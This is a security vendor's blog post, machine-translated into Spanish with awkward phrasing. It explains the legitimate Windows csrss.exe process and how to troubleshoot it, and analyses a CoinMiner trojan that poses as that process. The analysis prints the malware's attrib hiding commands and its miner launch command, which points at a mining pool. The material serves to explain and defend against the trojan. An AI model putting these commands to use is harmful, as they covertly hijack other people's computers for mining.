Virus troyano Csrss.exe

Csrss.exe Explained & Troubleshooting Guide
Exhaustive information about CSRSS.exe

Csrss.exe es un proceso importante de Windows, que a veces puede consumir una gran cantidad de recursos del sistema y desconcertar a los usuarios con tal comportamiento. Algunas personas pueden confundirlo con un virus troyano e intentar eliminarlo por la fuerza.. Así que, ¿Es csrss.exe peligroso?? Y cómo solucionar los problemas que crea.? Vamos a averiguar.

¿Qué es Csrss.exe??

Csrss.exe es un proceso legítimo de Windows con el nombre completo de Client Server Runtime Process y es fundamental para el sistema. Este proceso está presente en todas las versiones modernas de Windows., y no es raro observar varias instancias consecutivas. Este fenómeno es normal y no se considera un signo de virus.. El sistema ejecuta uno al inicio., y terminarlo leads to BSoD.

Este proceso en Windows 7, 8, y 10 es responsable de los programas de consola, procesos de apagado, iniciando otro proceso vital – conhost.exe – y otras funciones críticas del sistema. Utiliza algunos recursos en modo normal., entonces no hay motivo para cancelarlo. Es necesario para apagar el sistema., Máquina virtual DOS (VDM) soporte y otras funciones del sistema como Ctrl+C y Ctrl+Break procesamiento de señal, cambio de usuario, y montaje y desmontaje de discos.. Como función heredada, csrss.exe es responsable de abrir la ventana de la consola, pero sólo hasta el punto de iniciar el proceso conhost.exe.

Csrss.exe BSOD – Como arreglar?

A veces, después de manipulaciones fallidas con el archivo Csrss.exe u otros archivos del sistema, Windows puede volverse inestable o no iniciarse. La corrupción de archivos importantes del sistema de Windows puede causar esto. La solución es la siguiente.:

Ve a la Menú de solución de problemasOpciones avanzadasSímbolo del sistema en el entorno de recuperación. En el símbolo del sistema que se inicia, ejecuta el siguiente comando:

sfc /scannow /offbootdir=C:\ /offwindir=C:\Windows

Después de ingresar el comando, presione Enter y espere a que se complete el proceso. Esto puede llevar algún tiempo, pero asegúrate de esperar hasta el final, ya que es necesario para terminar los archivos del sistema’ reparar. Después de eso, cierre el símbolo del sistema y reinicie su computadora.

Resultado del comando Sfc para solucionar el problema CSRSS.exe
Resultado del comando SFC

Análisis de un virus troyano real

Encontramos varias muestras de Csrss.exe como virus troyano..

Pueden ser descargados de Internet por los propios usuarios.. A menudo, cuando los usuarios abren archivos desconocidos del mensaje de spam, infectan la computadora con diferentes tipos de malware parecido a virus. Pero el desarrollador de malware suele tener un plan B.. Adjuntan virus similares al instalar varios programas gratuitos. Por eso, si omite el proceso de instalación y no busca la configuración de ventajas, entonces listo que tu computadora se infectará con un virus como este.

Descubrimos una muestra de Trojan.CoinMiner escrito en Delphi, que se distribuye a través del correo spam:

Trojan Coin Miner PEiD v0.95

GridinSoft Anti-Malware lo detecta como «Trojan.Win32.CoinMiner.dd»

MD5: 922e0891ae30ac3adb3a09cb963570cc
SHA1: 77feeefff422519cdb63faa438fea87e5e70882a

Otros programas antivirus detectan Trojan.CoinMiner (csrss.exe) como:

DrWeb Trojan.Hosts.6838
Emsisoft Trojan.Agent.CEQQ (B)
CASO-NOD32 una variante de Win64/BitCoinMiner.AP potencialmente insegura
Kaspersky No es un virus:RiskTool.Win64.BitCoinMiner.cev

Archivos de caída de Trojan Miner:

C:\Windows\MicrosoftU
Auto.bat
Start.vbs
Start2.vbs
Hide.bat
Start.bat
Start2.bat
1.bat
2.bat
Srvany.exe
Csrss.exe
Srvanyx.exe

Después de descomprimir Trojan.CoinMiner. Oculta su presencia usando las cadenas en Hide.bat, configurar los atributos ocultos y del sistema para la carpeta y los archivos.

Attrib C:\Windows\MicrosoftU + S + H / S / D
Attrib C:\Windows\MicrosoftU\*. * + S + H / S / D

Trojan Miner utiliza el nombre de uno de los archivos del sistema «csrss.exe» para ocultar su presencia en el sistema.

El virus Csrss.exe comienza con los siguientes parámetros:

  • Estrato + TCP: //xmr.pool.minergate.com: 45560 – Recurso para el cual «minería» será ingresado
  • [email protected] – inicio de sesión del usuario de quien se introducirá la extracción
  • criptonoche – Algoritmo de minería

Otro parámetro es en cuántos subprocesos funcionará el programa.. Éste «minero» tiene una fórmula para calcular el número de núcleos de procesador involucrados. Está en el archivo .bat que inicia el «minero» por primera vez:

Set / a CPU =% NUMBER_OF_PROCESSORS% / 2 + 1
Srvanyx -a cryptonight -o stratum + tcp: //xmr.pool.minergate.com: 45560 -u [email protected] -p x -t% cpu%

Trojan.CoinMiner
No, está bien, la computadora solo se ralentiza lentamente

CPU alta & Solución de problemas de la GPU

Si encuentra un consumo anormal de GPU y CPU por parte del proceso csrss.exe, primero debes verificar la ubicación del archivo. para verificarlo, haga clic derecho sobre él y seleccione «Abrir localización de archivo«. Debe estar ubicado en «%RAÍZ DEL SISTEMA%system32«.

Captura de pantalla del archivo csrss.exe en la carpeta system32
Archivo csrss.exe en la carpeta system32

Próximo, haga clic derecho en el archivo y seleccione «Propiedades«, entonces el «Detalles» pestaña. El nombre del producto de este archivo debe ser «Sistema operativo Microsoft® Windows®«. También, la sección de derechos de autor debe ser «© Corporación Microsoft. Reservados todos los derechos

Propiedades del archivo csrss.exe
Propiedades del archivo csrss original

Si es el archivo csrss.exe original, puede causar una alta carga de CPU/GPU debido a funcionamiento incorrecto de las funciones es responsable de.

El consumo excesivo de GPU del proceso Client Server Runtime era anteriormente un problema reconocido en una de las actualizaciones acumulativas de Windows.. Sin embargo, Microsoft solucionó el problema mediante varias actualizaciones y revisiones.. Es posible que todavía estés usando una versión anterior de Windows con este problema. En ese caso, vaya a la sección de actualizaciones de Windows y haga clic en «Buscar actualizaciones«.

actualizacion de Windows

El siguiente paso es actualizar los controladores de su GPU.. Si tienes una Nvidia, abrir experiencia Geforce, y bajo el «Conductores» pestaña, hacer clic «Buscar actualizaciones» y sigue las instrucciones. Si tienes una GPU AMD, verifique el software Radeon para obtener actualizaciones. Es vital descargar los controladores de los sitios web oficiales.. Por favor Evite el uso de sitios de baja confianza. o instaladores de terceros como paquetes de controladores.

Captura de pantalla del proceso de actualización del controlador Nvidia
Proceso de actualización del controlador Nvidia

Si el problema persiste, ejecutar un escaneo SFC. Para hacer esto, ejecute el símbolo del sistema como administrador y pegue el «sfc /scannow» comando en él.

Si el proceso csrss.exe aún carga el dispositivo después de todas las manipulaciones, puedes crear un nuevo perfil de usuario. Para agregar un nuevo perfil de usuario a su PC, ir a la configuración (icono de engranaje) y seleccione Cuentas. En familia & Otros usuarios, Haga clic en Agregar otra persona a esta PC.. Elegir «No tengo la información de inicio de sesión de esta persona» y luego seleccione «Agregar un usuario sin una cuenta de Microsoft». Complete los detalles y haga clic en Siguiente. Recuerde otorgar privilegios de administrador solo a aquellos en quienes confía.

Administrar otra cuenta

Nota: Esta guía es relevante para usuarios de Windows. 10. Windows 11 carece de la opción de agregar una cuenta local y le pide que use una cuenta de Microsoft.

Crear una cuenta en línea en Windows 11 captura de pantalla
Crear una cuenta en línea en Windows 11

¿Es el virus troyano CSRSS.exe??

Primero, cualquier afirmación de que el «csrss.exe» archivo ubicado en «C:\WindowsSystem32» es un virus troyano es falso. El bajo conocimiento del usuario junto con los nombres de los procesos ininteligibles hacen que los nombres de los procesos del sistema sean una excelente opción. para ocultar malware. Generalmente, El malware intenta infectar o disfrazarse de procesos críticos del sistema operativo.. También, muchos virus usan el nombre de ese proceso o archivo ejecutable para disfrazarse y no hacerte sospechar. Cada sesión crea un proceso separado., permitiendo la ejecución simultánea de varias docenas de procesos.

Sin embargo, Es una buena razón para preocuparse si el csrss.exe tiene un alto nivel de CPU y GPU. la carga es constante. Pero incluso en este caso, Hay dos opciones para el comportamiento anormal del proceso.: malware y corrupción del perfil de usuario. El ejecutable original «csrss.exe» El archivo se almacena solo en un lugar. – en el «C:\WindowsSystem32» directorio. Si solo hay un sistema operativo instalado en el dispositivo, sustituir o sobrescribir este archivo en el directorio estándar es casi imposible.

Habiendo dicho eso, encontrar los archivos nombrados «csrss.exe» en otros directorios de su PC es una señal de actividad de malware. Para eliminar la amenaza, lanzamiento GridinSoft Anti-Malware y seleccione un escaneo completo. Espere hasta que se complete y realice todas las acciones sugeridas..

<lapso largo = "uno">Virus troyano Csrss.exe</durar>

Por Stephanie Adlam

Escribo sobre cómo hacer que tu navegación por Internet sea cómoda y segura. Vale la pena formar parte del mundo digital moderno y quiero mostrarte cómo hacerlo correctamente.

Dejar un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *